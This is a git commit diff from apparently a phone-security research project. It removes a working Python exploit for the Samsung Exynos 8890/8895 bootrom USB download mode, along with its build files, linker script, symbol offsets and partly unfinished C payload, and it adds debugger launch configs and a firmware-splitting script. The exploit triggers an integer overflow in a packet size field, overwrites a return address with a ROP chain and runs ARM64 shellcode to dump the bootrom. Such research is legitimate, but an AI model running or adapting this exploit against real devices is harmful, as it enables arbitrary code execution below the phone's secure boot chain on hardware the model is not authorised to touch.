update
This commit is contained in:
parent
87c5ce75c9
commit
ceba895566
@ -1,17 +0,0 @@
|
|||||||
ifeq ($(ANDROID_NDK_ROOT),)
|
|
||||||
$(error Error : Set the env variable 'ANDROID_NDK_ROOT' with the path of the Android NDK (version 20))
|
|
||||||
endif
|
|
||||||
|
|
||||||
CC := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android27-clang
|
|
||||||
AR := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ar
|
|
||||||
OBJCOPY := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-objcopy
|
|
||||||
LD := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ld.bfd
|
|
||||||
|
|
||||||
#==================Target Samsung S7 (8890)==================
|
|
||||||
CFLAGS_SAMSUNGS7 = -Os
|
|
||||||
|
|
||||||
dwc3:
|
|
||||||
$(CC) entry.S -c -o entry.o $(CFLAGS_SAMSUNGS7)
|
|
||||||
$(CC) $(CFLAGS_SAMSUNGS7) -c test_dwc3.c -o dwc3.o
|
|
||||||
$(LD) -T test_dwc3.ld entry.o dwc3.o -o dwc3.elf --just-symbols=symbols.txt
|
|
||||||
$(OBJCOPY) -O binary dwc3.elf dwc3.bin
|
|
16
source/S7/.vscode/launch.json
vendored
Normal file
16
source/S7/.vscode/launch.json
vendored
Normal file
@ -0,0 +1,16 @@
|
|||||||
|
{
|
||||||
|
// Use IntelliSense to learn about possible attributes.
|
||||||
|
// Hover to view descriptions of existing attributes.
|
||||||
|
// For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
|
||||||
|
"version": "0.2.0",
|
||||||
|
"configurations": [
|
||||||
|
{
|
||||||
|
"name": "Run exploit",
|
||||||
|
"type": "python",
|
||||||
|
"request": "launch",
|
||||||
|
"program": "exploit.py",
|
||||||
|
"console": "integratedTerminal",
|
||||||
|
"justMyCode": false
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
5
source/S7/split-sboot-8890.sh
Executable file
5
source/S7/split-sboot-8890.sh
Executable file
@ -0,0 +1,5 @@
|
|||||||
|
# input file argument : sboot.bin - G930W8VLS6CSH1 - sha1sum: 9322ccb4e9b382b8cc67ff9ef989c459a763621f
|
||||||
|
dd if=$1 of=$1.1.bin skip=0 bs=512 count=16 # 0x2000 @ 0x0
|
||||||
|
dd if=$1 of=$1.2.bin skip=16 bs=512 count=288 # 0x24000 @ 0x2000
|
||||||
|
dd if=$1 of=$1.3.bin skip=155648 bs=1 count=158992 # 0x26d10 @ 0x26000
|
||||||
|
dd if=$1 of=$1.4.bin skip=776 bs=512 count=1672 # 0xD1000 @ 0x61000
|
Binary file not shown.
BIN
source/dwc3.elf
BIN
source/dwc3.elf
Binary file not shown.
BIN
source/dwc3.o
BIN
source/dwc3.o
Binary file not shown.
@ -1,2 +0,0 @@
|
|||||||
start:
|
|
||||||
b main
|
|
BIN
source/entry.o
BIN
source/entry.o
Binary file not shown.
@ -1,288 +0,0 @@
|
|||||||
import usb.core
|
|
||||||
import usb.util
|
|
||||||
import struct, sys, usb1, libusb1, ctypes, usb
|
|
||||||
from keystone import *
|
|
||||||
from capstone import *
|
|
||||||
# from ghidra_assistant.utils.utils import *
|
|
||||||
|
|
||||||
def p32(x):
|
|
||||||
return struct.pack("<I", x)
|
|
||||||
|
|
||||||
def p8(x):
|
|
||||||
return struct.pack("<B", x)
|
|
||||||
|
|
||||||
def p16(x):
|
|
||||||
return struct.pack("<H", x)
|
|
||||||
|
|
||||||
def p64(x):
|
|
||||||
return struct.pack("<Q", x)
|
|
||||||
|
|
||||||
BLOCK_SIZE = 512
|
|
||||||
CHUNK_SIZE = 0xfffe00
|
|
||||||
MAX_PAYLOAD_SIZE = (BLOCK_SIZE - 10)
|
|
||||||
|
|
||||||
DL_BUFFER_START = 0x02021800
|
|
||||||
DL_BUFFER_SIZE = 0x4E800 #0x02070000 End
|
|
||||||
|
|
||||||
BOOTROM_START = 0x0
|
|
||||||
BOOTROM_SIZE = 0x20000 #128Kb
|
|
||||||
|
|
||||||
TARGET_OFFSETS = {
|
|
||||||
# XFER_BUFFER, RA_PTR, XFER_END_SIZE
|
|
||||||
"8890": (0x02021800, 0x02020F08, 0x02070000),
|
|
||||||
"8895": (0x02021800, 0x02020F18, 0x02070000)
|
|
||||||
}
|
|
||||||
|
|
||||||
ENDPOINT_BULK_IN = 0x81
|
|
||||||
ENDPOINT_BULK_OUT = 0x2
|
|
||||||
|
|
||||||
class ExynosDevice():
|
|
||||||
|
|
||||||
def __init__(self, idVendor=0x04e8, idProduct=0x1234):
|
|
||||||
"""Init with vendor/product IDs"""
|
|
||||||
self.idVendor = idVendor
|
|
||||||
self.idProduct = idProduct
|
|
||||||
self.target = "8890" # TODO auto detect device
|
|
||||||
self.connect_device()
|
|
||||||
|
|
||||||
def connect_device(self):
|
|
||||||
self.context = usb1.USBContext()
|
|
||||||
while True:
|
|
||||||
self.handle = self.context.openByVendorIDAndProductID(
|
|
||||||
vendor_id=self.idVendor,
|
|
||||||
product_id=self.idProduct,
|
|
||||||
skip_on_error=True
|
|
||||||
)
|
|
||||||
if self.handle == None:
|
|
||||||
continue
|
|
||||||
break
|
|
||||||
|
|
||||||
print("Connected device!")
|
|
||||||
|
|
||||||
def write(self, data, size=-1):
|
|
||||||
transfered = 0
|
|
||||||
transferred = ctypes.c_int()
|
|
||||||
if size == -1:
|
|
||||||
size = len(data)
|
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
|
|
||||||
assert(res == 0)
|
|
||||||
return transfered
|
|
||||||
|
|
||||||
def send_empty_transfer(self):
|
|
||||||
transfered = 0x200
|
|
||||||
transferred = ctypes.c_int()
|
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
|
|
||||||
assert(res == 0)
|
|
||||||
return transfered
|
|
||||||
|
|
||||||
def test_bug_2(self):
|
|
||||||
# Also bug here
|
|
||||||
# payload = p32(1) + p32(CHUNK_SIZE + 0x2001) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
|
|
||||||
# self.write(payload, MAX_PAYLOAD_SIZE)
|
|
||||||
# self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE)
|
|
||||||
|
|
||||||
transferred = ctypes.c_int()
|
|
||||||
bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
|
|
||||||
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
|
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
|
|
||||||
assert res == 0
|
|
||||||
|
|
||||||
payload = b"\xaa" * 0x200
|
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
|
|
||||||
assert res == 0
|
|
||||||
|
|
||||||
payload = b"\xaa" * 0x200
|
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
|
|
||||||
while True:
|
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
|
|
||||||
pass
|
|
||||||
|
|
||||||
def test_bug(self):
|
|
||||||
# Start by sending a valid packet
|
|
||||||
# Integer overflow in the size field
|
|
||||||
# unk + size + payload + header
|
|
||||||
payload = p32(0) + p32(0xFDFDE7FF + 0x1000) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
|
|
||||||
|
|
||||||
assert (len(payload) == BLOCK_SIZE)
|
|
||||||
self.write(payload, MAX_PAYLOAD_SIZE)
|
|
||||||
|
|
||||||
for i in range(200):
|
|
||||||
print(hex(self.send_empty_transfer()))
|
|
||||||
|
|
||||||
print('Bug probably available')
|
|
||||||
sys.exit(0)
|
|
||||||
|
|
||||||
def exploit(self, payload: bytes):
|
|
||||||
current_offset = TARGET_OFFSETS[self.target][0]
|
|
||||||
transferred = ctypes.c_int()
|
|
||||||
|
|
||||||
size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
|
|
||||||
max_payload_size = 0x100000000 - size_to_overflow
|
|
||||||
ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE)
|
|
||||||
|
|
||||||
# max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
|
|
||||||
# max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
|
|
||||||
payload = payload + ((max_payload_size - len(payload)) * b"\x00")
|
|
||||||
assert len(payload) == max_payload_size, "Invalid payload"
|
|
||||||
|
|
||||||
# First send payload to trigger the bug
|
|
||||||
bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
|
|
||||||
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
|
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
|
|
||||||
assert res == 0, "Error triggering payload"
|
|
||||||
assert transferred.value == len(bug_payload), "Invalid transfered size"
|
|
||||||
current_offset += len(bug_payload) - 8 # Remove header
|
|
||||||
|
|
||||||
cnt = 0
|
|
||||||
while True:
|
|
||||||
if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]:
|
|
||||||
break
|
|
||||||
self.send_empty_transfer()
|
|
||||||
current_offset += CHUNK_SIZE
|
|
||||||
cnt += 1
|
|
||||||
if current_offset > 0x100000000:
|
|
||||||
current_offset = current_offset - 0x100000000 #reset 32 byte integer
|
|
||||||
print(f"{cnt} {hex(current_offset)}")
|
|
||||||
|
|
||||||
remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
|
|
||||||
assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
|
|
||||||
if remaining > BLOCK_SIZE:
|
|
||||||
self.send_empty_transfer()
|
|
||||||
# Send last transfer, TODO who aligns this ROM??
|
|
||||||
current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
|
|
||||||
cnt += 1
|
|
||||||
print(f"{cnt} {hex(current_offset)}")
|
|
||||||
|
|
||||||
# Build ROP chain.
|
|
||||||
rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
|
|
||||||
transferred = ctypes.c_int(0)
|
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
|
|
||||||
assert res == 0, "Error sending ROP chain"
|
|
||||||
|
|
||||||
# Send some data
|
|
||||||
p = b"\xaa" * 0x200
|
|
||||||
transferred.value = 0
|
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100)
|
|
||||||
assert res == 0, "Error sending data"
|
|
||||||
|
|
||||||
buf = ctypes.c_buffer(b"", 0x20000)
|
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100)
|
|
||||||
|
|
||||||
# Should have received some bytes
|
|
||||||
pass
|
|
||||||
|
|
||||||
ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)
|
|
||||||
def usb_debug():
|
|
||||||
shellcode = f"""
|
|
||||||
start:
|
|
||||||
adr x0, test_fun
|
|
||||||
ldr x0, [x0]
|
|
||||||
blr x0
|
|
||||||
|
|
||||||
mov w1, #0x20000 // size
|
|
||||||
mov w0, #0x0 // address
|
|
||||||
bl usb_send
|
|
||||||
mov x0, #0
|
|
||||||
br x0 //reset
|
|
||||||
|
|
||||||
#Setup read usb
|
|
||||||
mov w0, #0x2
|
|
||||||
adr x1, shellcode_base
|
|
||||||
ldr x1, [x1]
|
|
||||||
mov w2, #0x02020000
|
|
||||||
add w2, w2, #0x2000
|
|
||||||
# endpoint, cb, buffer
|
|
||||||
adr x5, maybe_usb_setup_read
|
|
||||||
ldr x5, [x5]
|
|
||||||
blr x5
|
|
||||||
|
|
||||||
|
|
||||||
# Get something?? arg0 is endpoint
|
|
||||||
mov w0, #0x2
|
|
||||||
adr x1, maybe_read_size_endpoint
|
|
||||||
ldr x1, [x1]
|
|
||||||
blr x1
|
|
||||||
|
|
||||||
|
|
||||||
# # Send some data from ROM
|
|
||||||
# mov w1, #0x200 // size
|
|
||||||
# mov w0, #0x0 // address
|
|
||||||
# bl usb_send
|
|
||||||
# mov x0, #0
|
|
||||||
# br x0 //reset
|
|
||||||
|
|
||||||
|
|
||||||
# # dwc3_ep0_start_trans
|
|
||||||
# mov w1, w0
|
|
||||||
# mov w0, #0x2
|
|
||||||
# mov w2, #0x200
|
|
||||||
# adr x5, dwc3_ep0_start_trans
|
|
||||||
# ldr x5, [x5]
|
|
||||||
# blr x5
|
|
||||||
|
|
||||||
# # Send some data from ROM
|
|
||||||
# mov w1, #0x200 // size
|
|
||||||
# mov w0, #0x0 // address
|
|
||||||
# bl usb_send
|
|
||||||
# mov x0, #0
|
|
||||||
# br x0 //reset
|
|
||||||
|
|
||||||
usb_send:
|
|
||||||
stp x29, x30, [sp,#-48]!
|
|
||||||
mov w3, #0x0
|
|
||||||
bfxil w3, w1, #0, #24
|
|
||||||
mov w1, #0xc12
|
|
||||||
mov x29, sp
|
|
||||||
stp x19, x20, [sp,#16]
|
|
||||||
mov x5, #0xc834
|
|
||||||
mov w20, #0x1
|
|
||||||
movk x5, #0x1540, lsl #16
|
|
||||||
ldr x2, [x29,#40]
|
|
||||||
mov x4, #0xc838
|
|
||||||
orr w6, w1, w20
|
|
||||||
movk x4, #0x1540, lsl #16
|
|
||||||
mov x19, #0xc83c
|
|
||||||
movk x19, #0x1540, lsl #16
|
|
||||||
stp w3, w1, [x2,#8]
|
|
||||||
mov w3, #0x406
|
|
||||||
stp w0, wzr, [x2]
|
|
||||||
mov w0, w20
|
|
||||||
ldr x1, [x29,#40]
|
|
||||||
strb w6, [x2,#12]
|
|
||||||
mov x2, #0x27c8
|
|
||||||
str w1, [x5]
|
|
||||||
mov w1, #0x1388
|
|
||||||
str wzr, [x4]
|
|
||||||
str w3, [x19]
|
|
||||||
blr x2
|
|
||||||
mov w0, w20
|
|
||||||
ldr w1, [x19]
|
|
||||||
ldp x19, x20, [sp,#16]
|
|
||||||
ldp x29, x30, [sp],#48
|
|
||||||
ret
|
|
||||||
|
|
||||||
usb_read_endpoint: .quad 0x00006654
|
|
||||||
maybe_usb_setup_read: .quad 0x00006f88
|
|
||||||
shellcode_base: .quad 0x02021800
|
|
||||||
maybe_read_size_endpoint: .quad 0x00007a7c
|
|
||||||
dwc3_ep0_start_trans: .quad 0x0000791c
|
|
||||||
test_fun: .quad 0x000064e0
|
|
||||||
"""
|
|
||||||
shellcode = ks.asm(shellcode, as_bytes=True)[0]
|
|
||||||
|
|
||||||
shellcode = open("dwc3.bin", "rb").read()
|
|
||||||
|
|
||||||
exynos = ExynosDevice()
|
|
||||||
exynos.exploit(shellcode)
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
usb_debug()
|
|
||||||
sys.exit(0)
|
|
||||||
# wait_for_device()
|
|
||||||
exynos = ExynosDevice()
|
|
||||||
exynos.test_bug_2()
|
|
||||||
sys.exit(0)
|
|
||||||
path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
|
|
||||||
# path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
|
|
||||||
exynos.exploit(open(path, "rb").read())
|
|
||||||
pass
|
|
16
source/exploit/.vscode/launch.json
vendored
Normal file
16
source/exploit/.vscode/launch.json
vendored
Normal file
@ -0,0 +1,16 @@
|
|||||||
|
{
|
||||||
|
// Use IntelliSense to learn about possible attributes.
|
||||||
|
// Hover to view descriptions of existing attributes.
|
||||||
|
// For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
|
||||||
|
"version": "0.2.0",
|
||||||
|
"configurations": [
|
||||||
|
{
|
||||||
|
"name": "Debug exploit",
|
||||||
|
"type": "debugpy",
|
||||||
|
"request": "launch",
|
||||||
|
"program": "exploit.py",
|
||||||
|
"console": "integratedTerminal",
|
||||||
|
"args": ["--debug"]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
@ -1,9 +0,0 @@
|
|||||||
from ghidra_assistant.ghidra_assistant import GhidraAssistant
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
rom = open("S7/rom.bin", 'rb').read()
|
|
||||||
|
|
||||||
ga = GhidraAssistant()
|
|
||||||
ga.ghidra.add_memory(rom, 0x0, True, "ROM")
|
|
||||||
|
|
||||||
pass
|
|
@ -1,5 +0,0 @@
|
|||||||
maybe_usb_setup_read = 0x00006f88;
|
|
||||||
dwc3_ep0_start_trans = 0x0000791c;
|
|
||||||
usb_event_handler = 0x00007bac;
|
|
||||||
get_endpoint_buffer = 0x00007a7c;
|
|
||||||
sleep = 0x000027c8;
|
|
@ -1,100 +0,0 @@
|
|||||||
#include <stdint.h>
|
|
||||||
|
|
||||||
// Create external function at 0x00006f88
|
|
||||||
extern void maybe_usb_setup_read(char endpoint,void *fun,uint32_t target_buffer);
|
|
||||||
extern void dwc3_ep0_start_trans(char endpoint,uint32_t target_buf, uint32_t len);
|
|
||||||
extern int usb_event_handler(void);
|
|
||||||
extern void * get_endpoint_buffer(char endpoint);
|
|
||||||
extern void sleep(int endpoint,uint32_t timeout);
|
|
||||||
|
|
||||||
#define recv_buffer 0x02021800 + 0x2000
|
|
||||||
#define data_received 0x02021800 + 0x2004
|
|
||||||
|
|
||||||
void recv_data_cb(uint32_t endpoint, uint32_t len){
|
|
||||||
void *rbuf;
|
|
||||||
void *dest_buf = (void *)recv_buffer;
|
|
||||||
volatile void *dref = (void *)data_received;
|
|
||||||
|
|
||||||
rbuf = get_endpoint_buffer(endpoint);
|
|
||||||
for(int i= 0; i < len; i++){
|
|
||||||
*(char *)dest_buf = *(char *)(void *)((int)rbuf + i);
|
|
||||||
}
|
|
||||||
*(uint8_t *)dref = 1; // Mark as ready
|
|
||||||
}
|
|
||||||
|
|
||||||
void recv_data(){
|
|
||||||
// Set data_received to 0
|
|
||||||
// uint32_t *r = (uint32_t *) data_received;
|
|
||||||
// r = 0;
|
|
||||||
volatile void *dref = (void *)data_received;
|
|
||||||
*(uint8_t *)dref = 0;
|
|
||||||
|
|
||||||
maybe_usb_setup_read(2, recv_data_cb, 0x200);
|
|
||||||
void *rbuf = get_endpoint_buffer(2);
|
|
||||||
dwc3_ep0_start_trans(2, (uint32_t)rbuf, 0x200);
|
|
||||||
while(1){
|
|
||||||
usb_event_handler();
|
|
||||||
if(*(uint8_t *)dref == 1){
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
void send_data(void *address, uint32_t size){
|
|
||||||
maybe_usb_setup_read(0x81, NULL, 0x200);
|
|
||||||
void *rbuf = get_endpoint_buffer(1);
|
|
||||||
for(int i= 0; i < size; i++){
|
|
||||||
*(char *)(void *)((int)rbuf + i) = *(char *)(void *)((int)address + i);
|
|
||||||
}
|
|
||||||
dwc
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
void send_data(uint32_t *address, uint32_t size)
|
|
||||||
{
|
|
||||||
// asm("stp x29, x30, [sp,#-48]!");;
|
|
||||||
// asm("mov w3, #0x0");
|
|
||||||
// asm("bfxil w3, w1, #0, #24");
|
|
||||||
// asm("mov w1, #0xc12");
|
|
||||||
// asm("mov x29, sp");
|
|
||||||
// asm("stp x19, x20, [sp,#16]");
|
|
||||||
// asm("mov x5, #0xc834");
|
|
||||||
// asm("mov w20, #0x1");
|
|
||||||
// asm("movk x5, #0x1540, lsl #16");
|
|
||||||
// asm("ldr x2, [x29,#40]");
|
|
||||||
// asm("mov x4, #0xc838");
|
|
||||||
// asm("orr w6, w1, w20");
|
|
||||||
// asm("movk x4, #0x1540, lsl #16");
|
|
||||||
// asm("mov x19, #0xc83c");
|
|
||||||
// asm("movk x19, #0x1540, lsl #16");
|
|
||||||
// asm("stp w3, w1, [x2,#8]");
|
|
||||||
// asm("mov w3, #0x406");
|
|
||||||
// asm("stp w0, wzr, [x2]");
|
|
||||||
// asm("mov w0, w20");
|
|
||||||
// asm("ldr x1, [x29,#40]");
|
|
||||||
// asm("strb w6, [x2,#12]");
|
|
||||||
// asm("mov x2, #0x27c8");
|
|
||||||
// asm("str w1, [x5]");
|
|
||||||
// asm("mov w1, #0x1388");
|
|
||||||
// asm("str wzr, [x4]");
|
|
||||||
// asm("str w3, [x19]");
|
|
||||||
// asm("blr x2");
|
|
||||||
// asm("mov w0, w20");
|
|
||||||
// asm("ldr w1, [x19]");
|
|
||||||
// asm("ldp x19, x20, [sp,#16]");
|
|
||||||
// asm("ldp x29, x30, [sp],#48");
|
|
||||||
// asm("ret");
|
|
||||||
}
|
|
||||||
|
|
||||||
int main() {
|
|
||||||
while(1){
|
|
||||||
recv_data();
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
// recv_data();
|
|
||||||
// sleep(1, 5000);
|
|
||||||
asm("mov x0, #0x0");
|
|
||||||
asm("br x0");
|
|
||||||
}
|
|
@ -1,14 +0,0 @@
|
|||||||
MEMORY {
|
|
||||||
ROM (rwx): ORIGIN = 0x02021800, LENGTH = 0x1000
|
|
||||||
}
|
|
||||||
|
|
||||||
SECTIONS
|
|
||||||
{
|
|
||||||
. = 0x02021800;
|
|
||||||
.text . : {
|
|
||||||
*(.text*)
|
|
||||||
*(.data*)
|
|
||||||
*(.rodata*)
|
|
||||||
} >ROM
|
|
||||||
|
|
||||||
}
|
|
Loading…
Reference in New Issue
Block a user